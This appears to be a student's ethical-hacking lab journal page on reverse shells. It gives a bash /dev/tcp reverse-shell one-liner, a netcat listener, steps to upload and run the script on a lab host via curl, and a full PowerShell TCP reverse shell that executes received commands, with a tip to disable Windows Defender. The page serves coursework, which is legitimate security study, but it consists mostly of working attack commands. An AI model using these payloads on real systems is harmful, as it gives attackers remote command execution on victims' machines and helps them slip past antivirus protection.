Lab 8.2 Reverse Shells - JimKnee-Champ/Ethical-Hacking-Journal GitHub Wiki

One one terminal: ssh first.last@[email protected]

/bin/bash -i >& /dev/tcp/(eth0 ip address of listening machine) (port number, 4449 in this case) 0>&1

Second Terminal: nc -nlv -p 4449 - this will provide you with the ability to input commands. Listens on that port, will send the commands you type over to be interpreted through the shell.

Can upload a file containing the above /bin/bash command to pippin.shire.local, except changed to the wg0 interface (different networks).

using chmod 777 (filename) will make it executable. (10.0.5.25)

listen in the same way with the second terminal.

use curl to execute the .sh file.

Powershell code: powershell -c "$client = New-Object System.Net.Sockets.TCPClient('ATTACKERIP',ATTACKERPORT); $stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0}; while(($i = $stream.Read($bytes, 0, $bytes.length)) -ne 0){;$data= (New-Object -TypeName System.Text.ASCIIENcoding).GetString($bytes,0,$i);$sendback = (iex $data 2>&1 | Out-String);$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"

Launches powershell as a reverse shell on a windows system. If you could upload this file to a windows server and have it execute while you listened on a port, you would have reverse shell access. You need to disable windows defender first, which you can do by using the control panel.